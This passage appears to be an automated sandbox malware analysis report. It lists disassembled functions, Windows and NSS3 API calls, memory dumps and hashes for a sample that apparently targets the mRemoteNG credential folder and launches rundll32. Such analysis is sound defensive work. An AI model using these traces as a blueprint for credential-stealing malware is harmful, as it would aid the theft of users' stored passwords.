                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C37EEEA
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C37EEFB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3768380896-0
                                                                                                                                                                                                                                              • Opcode ID: 4303ecc1f28683ea039354284d306b013eeeeff0e8e82ddeae08f28e9d6346db
                                                                                                                                                                                                                                              • Instruction ID: 6f54131218c49ace86083bac33157681367e8b10c6390fa662c7702eb28d3590
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4303ecc1f28683ea039354284d306b013eeeeff0e8e82ddeae08f28e9d6346db
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB815AB5A003059FEB24CF59D884BAAB7F5BF88308F144428E8659BB51D739E814CFB5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6C37C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C37DAE2,?), ref: 6C37C6C2
                                                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6C37CD35
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DC6
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DD1
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D9DED
                                                                                                                                                                                                                                                • Part of subcall function 6C366C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C311C6F,00000000,00000004,?,?), ref: 6C366C3F
                                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C37CD54
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9BF0: TlsGetValue.KERNEL32(?,?,?,6C420A75), ref: 6C3D9C07
                                                                                                                                                                                                                                                • Part of subcall function 6C367260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C311CCC,00000000,00000000,?,?), ref: 6C36729F
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C37CD9B
                                                                                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C37CE0B
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C37CE2C
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C
                                                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C37CE40
                                                                                                                                                                                                                                                • Part of subcall function 6C3714C0: TlsGetValue.KERNEL32 ref: 6C3714E0
                                                                                                                                                                                                                                                • Part of subcall function 6C3714C0: EnterCriticalSection.KERNEL32 ref: 6C3714F5
                                                                                                                                                                                                                                                • Part of subcall function 6C3714C0: PR_Unlock.NSS3 ref: 6C37150D
                                                                                                                                                                                                                                                • Part of subcall function 6C37CEE0: PORT_ArenaMark_Util.NSS3(?,6C37CD93,?), ref: 6C37CEEE
                                                                                                                                                                                                                                                • Part of subcall function 6C37CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C37CD93,?), ref: 6C37CEFC
                                                                                                                                                                                                                                                • Part of subcall function 6C37CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C37CD93,?), ref: 6C37CF0B
                                                                                                                                                                                                                                                • Part of subcall function 6C37CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C37CD93,?), ref: 6C37CF1D
                                                                                                                                                                                                                                                • Part of subcall function 6C37CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C37CD93,?), ref: 6C37CF47
                                                                                                                                                                                                                                                • Part of subcall function 6C37CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C37CD93,?), ref: 6C37CF67
                                                                                                                                                                                                                                                • Part of subcall function 6C37CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C37CD93,?,?,?,?,?,?,?,?,?,?,?,6C37CD93,?), ref: 6C37CF78
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3748922049-0
                                                                                                                                                                                                                                              • Opcode ID: 0c92ea94daf3be3304902363c0db196c6786db1805ee9484663e3ef9b6b85a8d
                                                                                                                                                                                                                                              • Instruction ID: 8ef675af254b233f6006f9b9f0ac6ca60c2541a1cb66667e09837e874411be4f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c92ea94daf3be3304902363c0db196c6786db1805ee9484663e3ef9b6b85a8d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D451A676A005009BE730DF69EC40BAA73F4AF48349F250524D95597B40EB3AED05CFA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00417BAE
                                                                                                                                                                                                                                                • Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
                                                                                                                                                                                                                                                • Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
                                                                                                                                                                                                                                                • Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B
                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB
                                                                                                                                                                                                                                                • Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4
                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2005412495-0
                                                                                                                                                                                                                                              • Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
                                                                                                                                                                                                                                              • Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: free$Value$CriticalDeleteSection
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 195087141-0
                                                                                                                                                                                                                                              • Opcode ID: 0b894f3d495ef629ccc62677702e21fd3ed4a792eb87c415390f61f71be23550
                                                                                                                                                                                                                                              • Instruction ID: b5717c99e4f4166641e1fe17b67ef483365d6a03302540f9f67c99e513fe5e59
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b894f3d495ef629ccc62677702e21fd3ed4a792eb87c415390f61f71be23550
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9113D70504B498BCB21FF79C04866AFBF4BF45745F05092DE8DA93604EB349045CB82
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(04086718,?,?,?,0040F76C,?,04086718,00000000), ref: 0041596C
                                                                                                                                                                                                                                              • lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,04086718,04086718,?,0040F76C,?,04086718), ref: 00415990
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,0040F76C,?,04086718), ref: 004159A7
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004159C7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                              • String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
                                                                                                                                                                                                                                              • API String ID: 1206339513-4037762877
                                                                                                                                                                                                                                              • Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                              • Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00411307
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
                                                                                                                                                                                                                                              • String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
                                                                                                                                                                                                                                              • API String ID: 672783590-3078973353
                                                                                                                                                                                                                                              • Opcode ID: 6e7a0100c6f31bb2b4830e58b644d3e2cd34d3a7405b32bd71eb4f71f658ead2
                                                                                                                                                                                                                                              • Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e7a0100c6f31bb2b4830e58b644d3e2cd34d3a7405b32bd71eb4f71f658ead2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C29E53A
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C29E5BC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                                                                                              • Opcode ID: ea023c8c376e8a1d7e11b4b194883772c8f0cdd1502e0d4e391774766cb0e8e7
                                                                                                                                                                                                                                              • Instruction ID: 8b15c97533b28f47e5205e9fc892d409a53dd5fa0dc06f232cb7e20a1acdbe6f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea023c8c376e8a1d7e11b4b194883772c8f0cdd1502e0d4e391774766cb0e8e7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA315570640B199BD311CEAEC880D6AB7A0FB45715B64497CFC48A7B45F360E849C7E0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C315DEF,?,?,?), ref: 6C316456
                                                                                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C315DEF,?,?,?), ref: 6C316476
                                                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C315DEF,?,?,?), ref: 6C3164A0
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C315DEF,?,?,?), ref: 6C3164C2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CertificateError$DestroyTemp
                                                                                                                                                                                                                                              • String ID: ]1l
                                                                                                                                                                                                                                              • API String ID: 3886907618-3445790292
                                                                                                                                                                                                                                              • Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                                                                                                                                                                              • Instruction ID: 95b225f6ef5786b0d83a4f7784035d569d4b50cf740682e5d85c159f5ac11d00
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC21EB71A043016FEB285EA9DC45B6376F9EB40308F144538F559C6F41EBB2D554CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,@]:l,00000000,?,?,6C396AC6,?), ref: 6C3BAC2D
                                                                                                                                                                                                                                                • Part of subcall function 6C35ADC0: TlsGetValue.KERNEL32(?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AE10
                                                                                                                                                                                                                                                • Part of subcall function 6C35ADC0: EnterCriticalSection.KERNEL32(?,?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AE24
                                                                                                                                                                                                                                                • Part of subcall function 6C35ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C33D079,00000000,00000001), ref: 6C35AE5A
                                                                                                                                                                                                                                                • Part of subcall function 6C35ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AE6F
                                                                                                                                                                                                                                                • Part of subcall function 6C35ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AE7F
                                                                                                                                                                                                                                                • Part of subcall function 6C35ADC0: TlsGetValue.KERNEL32(?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AEB1
                                                                                                                                                                                                                                                • Part of subcall function 6C35ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C33CDBB,?,6C33D079,00000000,00000001), ref: 6C35AEC9
                                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,@]:l,00000000,?,?,6C396AC6,?), ref: 6C3BAC44
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]:l,00000000,?,?,6C396AC6,?), ref: 6C3BAC59
                                                                                                                                                                                                                                              • free.MOZGLUE(8CB6FF01,6C396AC6,?,?,?,?,?,?,?,?,?,?,6C3A5D40,00000000,?,6C3AAAD4), ref: 6C3BAC62
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                              • String ID: @]:l
                                                                                                                                                                                                                                              • API String ID: 1595327144-3214526920
                                                                                                                                                                                                                                              • Opcode ID: 852718b5e5444e992aa25e53b1fa6850668301047c809adb9a68cbac225c01f8
                                                                                                                                                                                                                                              • Instruction ID: 0fe3b2b171908d0ebc7b5ba2a18dd3f692d4b32bcfd4101b5dddb8d79004306e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 852718b5e5444e992aa25e53b1fa6850668301047c809adb9a68cbac225c01f8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F90128B56006009BDB00EF59E9D0B5677E8AB54B58F188068E9499FB06D731F948CFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
